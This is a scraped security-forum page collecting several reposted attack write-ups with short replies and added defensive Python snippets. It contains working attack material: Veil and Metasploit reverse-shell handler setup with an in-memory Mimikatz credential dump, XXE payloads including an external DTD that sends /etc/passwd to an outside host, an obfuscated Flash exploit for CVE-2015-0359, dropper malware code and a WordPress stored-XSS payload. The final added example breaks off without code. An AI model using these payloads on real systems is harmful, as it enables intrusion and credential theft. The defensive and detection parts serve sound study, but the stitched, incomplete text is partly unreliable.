We start with the assertion that the red team's attack graph is the blue team's kill chain. Per Captain Obvious: the better defenders (blue team) understand attacker methods (red team), the more able they are to defend against them. Conversely, the more red teamers are aware of blue team detection and analysis tactics, the more readily they can evade them. As we peel back this scenario, we'll explore both sides of the fight; I'll walk you through the entire process including attack and detection. I'll evade and exfiltrate, then detect and define. As you might imagine the attack starts with a targeted phishing attack. We won't linger here, you've all seen the like. The key take away for red and blue: the more enticing the lure, the more numerous the bites. Surveys promising rewards are particularly successful, everyone wants to "win" something, and sadly, many are willing to click and execute payloads to achieve their goal. These folks are the red team's best friend and the blue team's bane. Once the payload is delivered and executed for an initial foothold, the focus moves to escalation of privilege if necessary and acquisition of artifacts for pivoting and exploration of key terrain. With the right artifacts (credentials, hashes), causing effect becomes trivial, and often leads to total compromise. For this exercise, we'll assume we've compromised a user who is running their system with administrative privileges, which sadly remains all too common. With some great PowerShell and the omniscient and almighty Mimikatz, the victim's network can be your playground. I'll show you how.

ATTACK

Keep in mind, I'm going into some detail here regarding attack methods so we can then play them back from the defender's perspective with Rekall, WinPmem, and VolDiff.

Veil

All good phishing attacks need a great payload, and one of the best ways to ensure you deliver one is Christopher Truncer's (@ChrisTruncer) Veil-Evasion, part of the Veil-Framework. The most important aspect of Veil use is creating payloads that evade antimalware detection. This limits attack awareness for the monitoring and incident response teams as no initial alerts are generated. While the payload does land on the victim's file system, it's not likely to end up quarantined or deleted, happily delivering its expected functionality. I installed Veil-Evasion on my Kali VM easily:

    1) apt-get install veil
    2) cd /usr/share/veil-evasion/setup
    3) ./setup.sh

Thereafter, to run Veil you need only execute veil-evasion. Veil includes 35 payloads at present; choose list to review them. I chose 17) powershell/meterpreter/rev_https as seen in Figure 1.

Figure 1 – Veil payload options

I ran set LHOST 192.168.177.130 for my Kali server acting as the payload handler, followed by info to confirm, and generate to create the payload. I named the payload toolsmith, which Veil saved as toolsmith.bat. If you happened to view the .bat file in a text editor you'd see nothing other than what appears to be a reasonably innocuous PowerShell script with a large Base64 string. Many a responder would potentially roll right past the file as part of normal PowerShell administration. In a real-world penetration test, this would be the payload delivered via spear phishing, ideally to personnel known to have privileged access to key terrain.

Metasploit

This step assumes our victim has executed our payload in a time period of our choosing. Obviously set up your handlers before sending your phishing mail. I will not discuss persistence here for brevity's sake but imagine that an attacker will take steps to ensure continued access. Read Fishnet Security's How-To: Post-Ex Persistence Scripting with PowerSploit & Veil as a great primer on these methods. Again, on my Kali system I set up a handler for the shell access created by the Veil payload.

    1) cd /opt/metasploit/app/
    2) msfconsole
    3) use exploit/multi/handler
    4) set payload windows/meterpreter/reverse_https
    5) set lhost 192.168.177.130
    6) set lport 8443
    7) set exitonsession false
    8) run exploit -j

At this point back returns you to the root msf > prompt. When the victim executes toolsmith.bat, the handler reacts with a Meterpreter session as seen in Figure 2.

Figure 2 – Victim Meterpreter session

Use sessions -l to list sessions available, use sessions -i 2 to use the session seen in Figure 2. I now have an interactive shell with the victim system and have some options. As I'm trying to exemplify running almost entirely in victim memory, I opted not to copy additional scripts to the victim, but if I did so it would be another PowerShell script to make use of Joe Bialek's (@JosephBialek) Invoke-Mimikatz, which leverages Benjamin Delpy's (@gentilkiwi) Mimikatz. Instead I pulled down Joe's script directly from Github and ran it directly in memory, no file system attributes. To do so from the Meterpreter session, I executed the following.

    1) shell
    2) getsystem (if the user is running as admin you'll see "got system")
    3) spool /root/meterpreter_output.txt
    4) powershell.exe "iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

A brief explanation here. The shell command spawns a command prompt on the victim system, getsystem ensures that you're running as local system (NT AUTHORITY\SYSTEM), which is important when you're using Joe's script to leverage Mimikatz 2.0 along with Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. Again our goal here is to conduct activity such as dumping credentials without ever writing the Mimikatz binary to the victim file system. Our last line does so in an even craftier manner. To prevent the need to write output to the victim file system I used the spool command to write all content back to a text file on my Kali system. I used PowerShell's ability to read in Joe's script directly from Github into memory and poach credentials accordingly. Back on my Kali system a review of /root/meterpreter_output.txt confirms the win. Figure 3 displays the results.

Figure 3 – Invoke-Mimikatz for the win!

If I had pivoted from this system and moved to a heavily used system such as a terminal server or an Exchange server, I may have acquired domain admin credentials as well. I'd certainly have acquired local admin credentials, and no one ever uses the same local admin credentials across multiple systems, right? ;-) Remember, all this, with the exception of a fairly innocent looking initial payload, toolsmith.bat, took place in memory. How do we spot such behavior and defend against it? Time for Rekall and WinPmem, because they "can remember it for you wholesale!"

DEFENSE

Rekall preparation

Installing Rekall on Windows is as easy as grabbing the installer from Github, 1.3.2 as this is written. On x64 systems it will install to C:\Program Files\Rekall; you can add this to your PATH so you can run Rekall from anywhere.

WinPmem

WinPmem 1.6.2 is the current stable version and WinPmem 2.0 Alpha is the development release. Both are included on the project Github site. Having an imager embedded with the project is a major benefit, and it's developed against with a passion. Running WinPmem for live response is as simple as winpmem.exe -l to load the driver, then you launch Rekall to mount the winpmem device with rekal -f \\.\pmem (this cannot be changed) for live memory analysis.

Rekall use

There are a few ways to go about using Rekall. You can take a full memory image, locally with WinPmem, or remotely with GRR, and bring the image back to your analysis workstation. You can also interact with memory on the victim system in real-time live response, which is what differentiates Rekall from Volatility. On the Windows 7 x64 system I compromised with the attack described above I first ran winpmem_1.6.2.exe compromised.raw and shipped the 4GB memory image to my workstation. You can simply run rekal which will drop you into the interactive shell. As an example I ran rekal -f D:\forensics\memoryImages\toolsmith\compromised.raw, then from the shell ran various plugins. Alternatively I could have run rekal -f D:\forensics\memoryImages\toolsmith\compromised.raw netstat at a standard command prompt for the same results. The interactive shell is the "most powerful and flexible interface", most importantly because it allows session management and storage specific to an image analysis.

Suspicious Indicator #1

From the interactive shell I started with the netstat plugin, as I always do. Might as well see who is talking to whom, yes?
We’re treated to the instant results seen in Figure 4. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD]Figure 4 – Rekall netstat plugin shows PowerShell with connections[/TD] [/TR] [/TABLE] Yep, sure enough we see a connection to our above mention attacker at 192.168.177.130, the “owner” is attributed to powershell.exe and the PIDs are 1284 and 2396. Suspicious Indicator #2 With the pstree plugin we can determine the parent PIDs (PPID) for the PowerShell processes. What’s odd here from a defender’s perspective is that each PowerShell process seen in the pstree (Figure 5) is spawned from cmd.exe. While not at all conclusive, it is at least intriguing. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD]Figure 5 – Rekall pstree plugin shows powershell.exe PPIDs[/TD] [/TR] [/TABLE] Suspicious Indicator #3 I used malfind to find hidden or injected code/DLLs and dump the results to a directory I was scanning with an AV engine. With malfind pid=1284, dump_dir="/tmp/" I received feedback on PID 1284 (repeated for 2396), with indications specific to Trojan:Win32/Swrort.A. From the MMPC write-up: “Trojan:Win32/Swrort.A is a detection for files that try to connect to a remote server. Once connected, an attacker can perform malicious routines such as downloading other files. They can be installed from a malicious site or used as payloads of exploit files. Once executed, Trojan:Win32/Swrort.A may connect to a remote server using different port numbers.” Hmm, sound familiar from the attack scenario above? ;-) Note that the netstat plugin found that powershell.exe was connecting via 8443 (a “different” port number). Suspicious Indicator #4 To close the loop on this analysis, I used memdump for a few key reasons. This plugin dumps all addressable memory in a process, enumerates the process page tables and writes them out into an external file, creates an index file useful for finding the related virtual address. 
I did so with memdump pid=2396, dump_dir="/tmp/", ditto for PID 1284. You can use the .dmp output to scan for malware signatures or other patterns. One such method is strings keyword searches. Given that we are responding to what we can reasonably assert is an attack via PowerShell a keyword-based string search is definitely in order. I used my favorite context-driven strings tool and searched for invoke against powershell.exe_2396.dmp. The results paid immediate dividends, I’ve combined to critical matches in Figure 6. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD]Figure 6 – Strings results for keyword search from memdump output[/TD] [/TR] [/TABLE] Suspicions confirmed, this box be owned, aargh! The strings results on the left show the initial execution of the PowerShell payload, most notably including the Hidden attribute and the Bypass execution policy followed by a slew of Base64 that is the powershell/meterpreter/rev_https payload. The strings results on the left show when Invoke-Mimikatz.ps1 was actually executed. Four quick steps with Rekall and we’ve, in essence, reversed the steps described in the attack phase. Remember too, we could just as easily have conducted these same step on a live victim system with the same plugins via the following: rekal -f \\.\pmem netstat rekal -f \\.\pmem pstree rekal -f \\.\pmem malfind pid=1284, dump_dir="/tmp/" rekal -f \\.\pmem memdump pid=2396, dump_dir="/tmp/" In Conclusion In celebration of the annual infosec tools addition, we’ve definitely gone a bit hog wild, but because it has been for me, I have to imagine you’ll find this level of process and detail useful. Michael and team have done wonderful work with Rekall and WinPmem. I’d love to hear your feedback on your usage, particularly with regard to close, cooperative efforts between your red and blue teams. If you’re not yet using these tools yet, you should be, and I recommend a long, hard look at GRR as well. I’d also like to give more credit where it’s due. 
In addition to Michael Cohen, other tools and tactics here were developed and shared by people who deserve recognition. They include Microsoft’s Mike Fanning, root9b’s Travis Lee (@eelsivart), and Laconicly’s Billy Rios (@xssniper). Thank you for everything, gentlemen. Ping me via email or Twitter if you have questions (russ at holisticinfosec dot org or @holisticinfosec). Cheers…until next month. Acknowledgements Michael Cohen, Rekall/GRR developer and project lead (@scudette) Posted by Russ McRee at 8:50 AM Sursa: http://holisticinfosec.blogspot.ro/2015/05/toolsmith-attack-detection-hunting-in.html
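Suspicious Indicators #1 and #2 above are found by reading the netstat and pstree output by eye; the same correlation can be scripted so a responder gets the parent chain and the connections for every PowerShell process in one pass. This is an added example and not Rekall's code or the post's: the record layout and the sample rows are constructed (the PIDs 1284 and 2396, port 8443 and the handler address come from the post, everything else is made up), and the set of parents treated as unusual beyond cmd.exe is an assumption a hunt team would tune per estate.

```python
"""Correlate a process list with a connection list to flag powershell.exe
that (a) was spawned by an unusual parent or (b) holds a network connection,
the two indicators the Rekall walkthrough above surfaces with pstree/netstat.
Added example; record layout and sample data are constructed, not Rekall output."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    name: str


@dataclass(frozen=True)
class Conn:
    pid: int
    owner: str
    remote_ip: str
    remote_port: int
    state: str


# Constructed process list, loosely mirroring Figure 5 of the post.
PROCS = [
    Proc(4, 0, "System"),
    Proc(1004, 4, "explorer.exe"),
    Proc(1100, 1004, "cmd.exe"),
    Proc(1284, 1100, "powershell.exe"),
    Proc(2300, 1004, "cmd.exe"),
    Proc(2396, 2300, "powershell.exe"),
    Proc(3000, 1004, "powershell.exe"),   # launched by an admin from the shell: benign
    Proc(3100, 1004, "outlook.exe"),
]

# Constructed connection list, loosely mirroring Figure 4 of the post.
CONNS = [
    Conn(1284, "powershell.exe", "192.168.177.130", 8443, "ESTABLISHED"),
    Conn(2396, "powershell.exe", "192.168.177.130", 8443, "ESTABLISHED"),
    Conn(3100, "outlook.exe", "10.0.0.25", 443, "ESTABLISHED"),
]

# The post flags cmd.exe as the odd parent; the others are assumptions
# (script hosts and Office) that a team would adjust to its own baseline.
SUSPICIOUS_PARENTS = {"cmd.exe", "wscript.exe", "cscript.exe",
                      "winword.exe", "excel.exe", "outlook.exe"}


def ancestry(procs, pid):
    """Return the process-name chain from the root down to pid."""
    by_pid = {p.pid: p for p in procs}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid].name)
        pid = by_pid[pid].ppid
    return list(reversed(chain))


def triage(procs, conns, suspicious_parents=SUSPICIOUS_PARENTS):
    """Map PID -> indicator strings for every powershell.exe that trips at
    least one indicator; PowerShell with a normal parent and no connections
    (PID 3000 above) is left out."""
    by_pid = {p.pid: p for p in procs}
    findings = {}
    for p in procs:
        if p.name.lower() != "powershell.exe":
            continue
        hits = []
        parent = by_pid.get(p.ppid)
        if parent and parent.name.lower() in suspicious_parents:
            hits.append(f"parent is {parent.name} (pid {parent.pid})")
        for c in conns:
            if c.pid == p.pid:
                hits.append(f"{c.state} to {c.remote_ip}:{c.remote_port}")
        if hits:
            findings[p.pid] = hits
    return findings


def report(procs, conns):
    """Render the triage result as one line per finding with the parent chain."""
    lines = []
    for pid, hits in sorted(triage(procs, conns).items()):
        lines.append(f"PID {pid}: {' > '.join(ancestry(procs, pid))}")
        lines.extend(f"  - {h}" for h in hits)
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(PROCS, CONNS))
```

The report for the constructed data names PIDs 1284 and 2396 only, each with the explorer.exe > cmd.exe > powershell.exe chain and the 8443 connection, which is the same conclusion the post reaches from Figures 4 and 5.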
  5. And the Hungarians?
  6. The "how do I use it?" questions are coming.
  7. If it displays the file name (which contains the entity in question, i.e. the contents of /etc/passwd) then it should be displayed in full. Yes, it depends on that too, but it's an idea that can be useful.
  8. Forcing XXE Reflection through Server Error Messages

Antti Rantasaari | May 4, 2015

XML External Entity (XXE) injection attacks are a simple way to extract files from a remote server via web requests. For easy use of XXE, the server response must include a reflection point that displays the injected entity (remote file) back to the client. Below is an example of a common XXE injection request and response. The injections have been bolded in red.

HTTP Request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 288

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<search>name</search>
<value>&netspi;</value>
</root>

HTTP Response:

HTTP/1.1 200 OK
Content-Type: application/xml
Content-Length: 2467

<?xml version="1.0" encoding="UTF-8"?>
<errors>
<error>no results for name root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync....
</error>
</errors>

However, it’s also very common for nothing to be returned in the error response if the application doesn’t reflect any user input back to the client. This can make simple XXE attacks harder. If connections are allowed to remote systems from the vulnerable server then it’s possible to use an external DTD to extract local files via web requests. This technique has been covered in greater detail at this whitepaper, but below is an overview of how the modified XXE injection technique works and can be executed.

Host a .dtd file on a web server that is accessible from the vulnerable system. In my example the “netspi.dtd” file is hosted on xxe.netspi.com. The DTD file contains an XXE injection that will send the contents of the /etc/password file to the web server at Not Found.

<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 '<!ENTITY % external SYSTEM "http://xxe.netspi.com/x=%payload;">'>
%param1;
%external;

Next, the attack can be executed by referencing the hosted DTD file as shown below. The request does not even have to contain any XML body, as long as the server processes XML requests.

HTTP Request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 139

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo SYSTEM "http://xxe.netspi.com/netspi.dtd">
<root>
<search>name</search>
</root>

At this point the XXE attack results in a connection to xxe.netspi.com to load the external DTD file. The hosted DTD file then uses parameter entities to wrap the contents of the /etc/passwd file into another HTTP request to xxe.netspi.com. Now it may be possible to extract the contents of the /etc/passwd file without having a reflection point on the page itself, but by reading incoming traffic on xxe.netspi.com. The file contents can be parsed from web server logs or from an actual page. I should note that only a single line of /etc/passwd can be read using this method, or the HTTP request may fail altogether because of line breaks in the target file.

There is another option though. In some cases it’s also possible to make data extraction easier by forcing an error on the server by adding an invalid URI to the request. Below is an example of a modified DTD:

<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 '<!ENTITY % external SYSTEM "file:///nothere/%payload;">'>
%param1;
%external;

If the server displays verbose errors to the client, the error may contain the contents of the file that’s getting extracted. Below is an example:

HTTP Response:

HTTP/1.1 500 Internal Server Error
Content-Type: application/xml
Content-Length: 2467

<?xml version="1.0" encoding="UTF-8"?><root>
<errors>
<errorMessage>java.io.FileNotFoundException: file:///nothere/root:x:0:0:root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync....

The invalid file path causes a “FileNotFoundException”, and an error message that contains the /etc/passwd file contents. This same technique was recently covered in this Drupal XXE whitepaper as well, but as I had the blog post written I thought I might as well publish it.

References

https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing
http://www.vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf

Source: https://blog.netspi.com/forcing-xxe-reflection-server-error-messages/
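All three request shapes in the post (inline DTD with a SYSTEM entity, external DTD reference, and the error-forcing DTD) share one prerequisite: the server's XML parser accepts a DOCTYPE and is willing to resolve entities. The hardening that removes the whole class is to refuse the DOCTYPE before any entity is defined, and to keep error responses generic so the error page cannot become the reflection point the post describes. The following is an added example and not NetSPI's code; it uses Python's standard-library expat parser, and the sample request bodies are constructed from the post's examples.

```python
"""Parse an untrusted XML request body while refusing DTDs and external
entities, so neither the reflected nor the error-message XXE variants from
the post can work. Added example built on Python's stdlib expat bindings;
the sample documents are constructed from the post's requests."""
import re
import xml.parsers.expat as expat


class UnsafeXml(ValueError):
    """Raised for any DOCTYPE or external entity reference. The message is
    deliberately generic: it must never echo attacker-controlled content or
    file data, which is exactly what the verbose Java error in the post did."""


DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)


def has_doctype(data: bytes) -> bool:
    """Cheap pre-parse check, suitable for a request filter or for tagging
    request logs; a DOCTYPE has no legitimate use in an API request body."""
    return DOCTYPE_RE.search(data) is not None


def parse_untrusted(data: bytes) -> dict:
    """Parse a flat <root><tag>text</tag>...</root> body into {tag: text}."""
    parser = expat.ParserCreate()
    # Never process parameter entities, so an external DTD is never fetched
    # even if a DOCTYPE somehow got past the handler below.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXml("DTD declarations are not accepted")

    def on_external_entity(context, base, sysid, pubid):
        raise UnsafeXml("external entities are not accepted")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity

    result, stack, text = {}, [], []

    def start(name, attrs):
        stack.append(name)
        text.clear()

    def chars(chunk):
        text.append(chunk)

    def end(name):
        stack.pop()
        if len(stack) == 1:          # direct child of the root element
            result[name] = "".join(text).strip()
        text.clear()

    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars
    parser.EndElementHandler = end
    parser.Parse(data, True)
    return result


def rejects(data: bytes) -> bool:
    """True when parse_untrusted refuses the document as unsafe."""
    try:
        parse_untrusted(data)
    except UnsafeXml:
        return True
    return False


# Constructed sample bodies, modelled on the post's requests.
BENIGN = b"""<?xml version="1.0" encoding="UTF-8" ?>
<root>
<search>name</search>
<value>netspi</value>
</root>"""

INLINE_DTD = b"""<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<search>name</search>
<value>&xxe;</value>
</root>"""

EXTERNAL_DTD = b"""<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo SYSTEM "http://xxe.netspi.com/netspi.dtd">
<root>
<search>name</search>
</root>"""

if __name__ == "__main__":
    print("benign:", parse_untrusted(BENIGN))
    for label, doc in (("inline DTD", INLINE_DTD), ("external DTD", EXTERNAL_DTD)):
        print(label, "rejected:", rejects(doc))
```

The DOCTYPE handler fires before the internal subset or the external DTD is processed, so the SYSTEM entity is never defined and nothing is fetched from xxe.netspi.com; the caller catches UnsafeXml and answers with a fixed 400, not with the parser's message.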
  9. Flash_Exploit.SWF CVE-2015-0359 PoC BY: _D3F4ULT package { public class $1$6$7$@120984$cQhWvZ56 { } $1$6$7$@120984$cQhWvZ56 = [OP_NEWCLASS ClassInfo:0 base:Object]; 34643$OfA2FuRBJ#@ = [OP_NEWCLASS ClassInfo:1 base:MovieClip]; 3m3qT@@9jm4 = [OP_NEWCLASS ClassInfo:2 base:Object]; 6KovfYYrEFkW = [OP_NEWCLASS ClassInfo:3 base:ByteArray]; }//package import flash.display.*; import flash.system.*; import flash.utils.*; package { public class 34643$OfA2FuRBJ#@ extends MovieClip { private var 13AFv7jyfFP; private var YWH9DbQhT:Class; private var 65%$uHPix2Gq4k%ss = "ToStage"; private var _StrPool46:uint = 0; private var %%Awjftgdfe^&:uint = 0; private var X4O3S0e:uint = 0xFF; private var 3eMXkL2fIA; private var 86OI8FG3RS4; public function 34643$OfA2FuRBJ#@(_arg1:Object=null){ Security[((("al" + "low") + "Dom") + "ain")]("*"); var _local2:* = ApplicationDomain[(("current" + "Do") + "main")]; this.65%$uHPix2Gq4k%ss = (("ad" + "ded") + this.65%$uHPix2Gq4k%ss); var _local4 = (_local2[("getD" + "efinition")]("flash.display.Loader") as Class); this.13AFv7jyfFP = new (_local4)(); this.YWH9DbQhT = (_local2[("getD" + "efinition")]("flash.utils.ByteArray") as Class); if (this["stage"]){ this.4kjf1flZV1ZTA7(); } else { this["addEventListener"](this.65%$uHPix2Gq4k%ss, this.4kjf1flZV1ZTA7); }; } public function EmptyHandler(_arg1:Object, _arg2:int):void{ _arg2++; } private function 4kjf1flZV1ZTA7(_arg1:Object=null):void{ this[(("rem" + "oveEven") + "tListener")](this.65%$uHPix2Gq4k%ss, this.4kjf1flZV1ZTA7); this["addEventListener"]("enterFrame", this.TVN3N5UQ); var _local2:* = new 6KovfYYrEFkW(); var _local3:* = new this.YWH9DbQhT(); this.$$!!323tr(); this.ym9LDy3rDi8Fz(_local2, _local2["length"], _local3); this.gzZrsob66e0cB6oT(_local3); var _local4:uint = 91; var _local5 = 0; if ((_local5 < _local3["length"])){ var _local6:uint = (_local3[_local5] ^ _local4); _local4 = _local3[_local5]; _local3[_local5] = _local6; _local5++; //unresolved jump }; var _local8 = "com"; 
_local3[((("un" + _local8) + "pres") + "s")](); this.13AFv7jyfFP[("load" + "Bytes")](_local3); this[("add" + "Child")](this.13AFv7jyfFP); //unresolved jump !ERROR! return; } private function TVN3N5UQ(_arg1):void{ if ((this.currentFrame == 200)){ this.gotoAndPlay(new Number(2)); return; }; } private function $$!!323tr():void{ this.3eMXkL2fIA = new this.YWH9DbQhT(); this.86OI8FG3RS4 = new this.YWH9DbQhT(); var _local2:int; _local2 = 65; if ((_local2 < 91)){ this.86OI8FG3RS4["writeByte"](_local2); _local2++; //unresolved jump }; _local2 = 97; if ((_local2 < 123)){ this.86OI8FG3RS4["writeByte"](_local2); _local2++; //unresolved jump }; _local2 = 48; if ((_local2 < 58)){ this.86OI8FG3RS4["writeByte"](_local2); _local2++; //unresolved jump }; _local2 = 33; if ((_local2 < 48)){ if ((((((_local2 == 34)) || ((_local2 == 39)))) || ((_local2 == 45)))){ } else { this.86OI8FG3RS4["writeByte"](_local2); }; _local2++; //unresolved jump }; _local2 = 58; if ((_local2 < 65)){ this.86OI8FG3RS4["writeByte"](_local2); _local2++; //unresolved jump }; _local2 = 91; if ((_local2 < 97)){ if ((_local2 == 92)){ } else { this.86OI8FG3RS4["writeByte"](_local2); }; _local2++; //unresolved jump }; _local2 = 123; if ((_local2 < 127)){ this.86OI8FG3RS4["writeByte"](_local2); _local2++; //unresolved jump }; this.86OI8FG3RS4["writeByte"](34); var _local3:int; _local3 = 0; if ((_local3 < 0xFF)){ this.3eMXkL2fIA[_local3] = 0xFF; _local3++; //unresolved jump }; _local3 = 0; if ((_local3 < this.86OI8FG3RS4["length"])){ this.3eMXkL2fIA[this.86OI8FG3RS4[_local3]] = _local3; _local3++; //unresolved jump }; } public function gzZrsob66e0cB6oT(_arg1):uint{ var _local2:uint = 0; if (!((this.X4O3S0e == 0xFF))){ _arg1[_arg1["length"]] = (this._StrPool46 | (this.X4O3S0e << this.%%Awjftgdfe^&)); _local2 = (_local2 + 1); }; return (_local2); } public function ym9LDy3rDi8Fz(_arg1, _arg2:uint, _arg3):uint{ var _local4 = 0; var _local5:uint = 0; _local4 = 0; if ((_local4 < _arg2)){ if ((this.3eMXkL2fIA[_arg1[_local4]] 
== 0xFF)){ } else { if ((this.X4O3S0e == 0xFF)){ this.X4O3S0e = this.3eMXkL2fIA[_arg1[_local4]]; } else { this.X4O3S0e = (this.X4O3S0e + (this.3eMXkL2fIA[_arg1[_local4]] * this.86OI8FG3RS4["length"])); this._StrPool46 = (this._StrPool46 | (this.X4O3S0e << this.%%Awjftgdfe^&)); this.%%Awjftgdfe^& = (this.%%Awjftgdfe^& + ((((this.X4O3S0e & 8191) > 88)) ? 13 : 14)); var _local7 = _local5; _local5 = (_local7 + 1); _arg3[_local7] = (this._StrPool46 & 0xFF); this._StrPool46 = (this._StrPool46 >> 8); this.%%Awjftgdfe^& = (this.%%Awjftgdfe^& - 8); //unresolved if this.X4O3S0e = 0xFF; }; }; _local4++; //unresolved jump }; return (_local5); } } }//package package { public class 3m3qT@@9jm4 { } }//package package { public class 6KovfYYrEFkW extends ByteArray { public function 9IRh0mi4XOG():void{ } public function A3Ig1if():int{ return (0); } } }//package "twitter.com/_d3f4ult"Via: http://pastebin.com/5nnP7X0x
  10. Writing a Metasploit post exploitation module

April 6, 2015 Ionut Popescu

The exploitation of a machine is only a step in a penetration test. What do you do next? How can you pivot from the exploited machine to other machines in the network? This is the step where you need to prove your post exploitation skills. Even if Metasploit is a complex framework, it is not complete and you can extend it.

Why would I write one?

Metasploit is the “World’s most used penetration testing software”; it contains a huge collection of modules, but it is not complete and you can customize it by writing your own modules. Even if you manage to compromise a machine, you may ask yourself: “Now what?”. You can use one of the many Metasploit post exploitation modules, but what if you don’t find a suitable module? You may request it from the Metasploit community and developers, but it may take a lot of time until it becomes available. So why don’t you try to write your own module?

Full article: Writing a Metasploit post exploitation module – Security Café
  11. It's relative. The opcode "eb 17" == "jump 0x17 bytes"

8048062 (the next address) + 0x17 == 8048079

It's odd that it's "jmp 8048079" and not "jmp 08048078", because at "08048078" sits the call that pushes "/bin/sh" onto the stack.

Ah, damn. If you look at the shellcode in the C program:

\xeb\x16\x5e\x31

It's "eb 16", i.e. "jmp 08048078".
  12. You probably like women from Korea or Japan, not China.
  13. Malware. It copies some crap (poorly bound, unencrypted) into AppData. The thing is written in .NET and it's easy to see:

public object Xtraer()
{
    object obj2;
    int num2;
    try
    {
        int num3;
    Label_0001:
        ProjectData.ClearProjectError();
        int num = -2;
    Label_0009:
        num3 = 2;
        FileSystem.FileOpen(1, this.Ruta1 + @"\ndwkdwmm.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Shared, -1);
    Label_0028:
        num3 = 3;
        FileSystem.FilePut(1, this.Dat[1], -1L, false);
    Label_003D:
        num3 = 4;
        FileSystem.FileClose(new int[] { 1 });
    Label_0052:
        num3 = 5;
        Interaction.Shell(this.Ruta1 + @"\ndwkdwmm.exe", AppWinStyle.NormalFocus, false, -1);
    Label_006E:
        num3 = 6;
        FileSystem.FileOpen(2, this.Ruta2 + @"\lklslslowlsloloaolsl.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Shared, -1);
    Label_008D:
        num3 = 7;
        FileSystem.FilePut(2, this.Dat[2], -1L, false);
    Label_00A2:
        num3 = 8;
        FileSystem.FileClose(new int[] { 2 });
    Label_00B7:
        num3 = 9;
        Interaction.Shell(this.Ruta2 + @"\lklslslowlsloloaolsl.exe", AppWinStyle.NormalFocus, false, -1);

Real scan: https://www.virustotal.com/ro/file/8c6ac3cac91fe069cf49888f81eecc11733b788cc8bb0eb4b40e96dc2460f108/analysis/1430732314/
  14. Disable "Facebook platform" in the Facebook settings.
  15. WordPress 4.2 stored XSS

From: Jouko Pynnonen <jouko () iki fi>
Date: Mon, 27 Apr 2015 05:15:46 +0300

OVERVIEW
==========

Current versions of WordPress are vulnerable to a stored XSS. An unauthenticated attacker can inject JavaScript in WordPress comments. The script is triggered when the comment is viewed.

If triggered by a logged-in administrator, under default settings the attacker can leverage the vulnerability to execute arbitrary code on the server via the plugin and theme editors. Alternatively the attacker could change the administrator’s password, create new administrator accounts, or do whatever else the currently logged-in administrator can do on the target system.

DETAILS
========

If the comment text is long enough, it will be truncated when inserted in the database. The MySQL TEXT type size limit is 64 kilobytes so the comment has to be quite long. The truncation results in malformed HTML generated on the page. The attacker can supply any attributes in the allowed HTML tags, in the same way as with the two other recently published stored XSS vulnerabilities affecting the WordPress core.

The vulnerability bears a similarity to the one reported by Cedric Van Bockhaven in 2014 (patched this week, after 14 months). Instead of using an invalid UTF-8 character to truncate the comment, this time an excessively long comment text is used for the same effect.

In these two cases the injected JavaScript apparently can't be triggered in the administrative Dashboard, so these exploits require getting around comment moderation e.g. by posting one harmless comment first.

PROOF OF CONCEPT
==================

Enter the following as a comment:

<a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA [64 kb] ...'></a>

This was tested on WordPress 4.2, 4.1.2, and 4.1.1, MySQL versions 5.1.53 and 5.5.41.

SOLUTION
=========

Disable comments (Dashboard, Settings/Discussion, select as restrictive options as possible). Do not approve any comments.

CREDITS
========

The vulnerability was discovered by Jouko Pynnönen of Klikki Oy.

An up-to-date version of this document: http://klikki.fi/adv/wordpress2.html

--
Jouko Pynnönen <jouko () iki fi>
Klikki Oy - http://klikki.fi - @klikkioy

Source: Bugtraq: WordPress 4.2 stored XSS
  16. Strength.
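The root cause in the advisory above is an ordering problem: the HTML filter approves one string, the database stores a shorter one, and the page renders the shorter one, so the filtered and rendered markup no longer match. The following is an added example, not WordPress code, showing that failure mode and the guard that removes it: enforce the column's byte limit on the filtered text itself and refuse anything storage would alter. The 65535-byte figure is the MySQL TEXT limit the advisory cites; the store functions are simplified stand-ins for a comment pipeline.

```python
"""Filter-then-truncate vs. check-before-store for a comment column.
Added example, not WordPress code; MYSQL_TEXT_MAX is the TEXT limit from the
advisory and the sample comments are constructed."""

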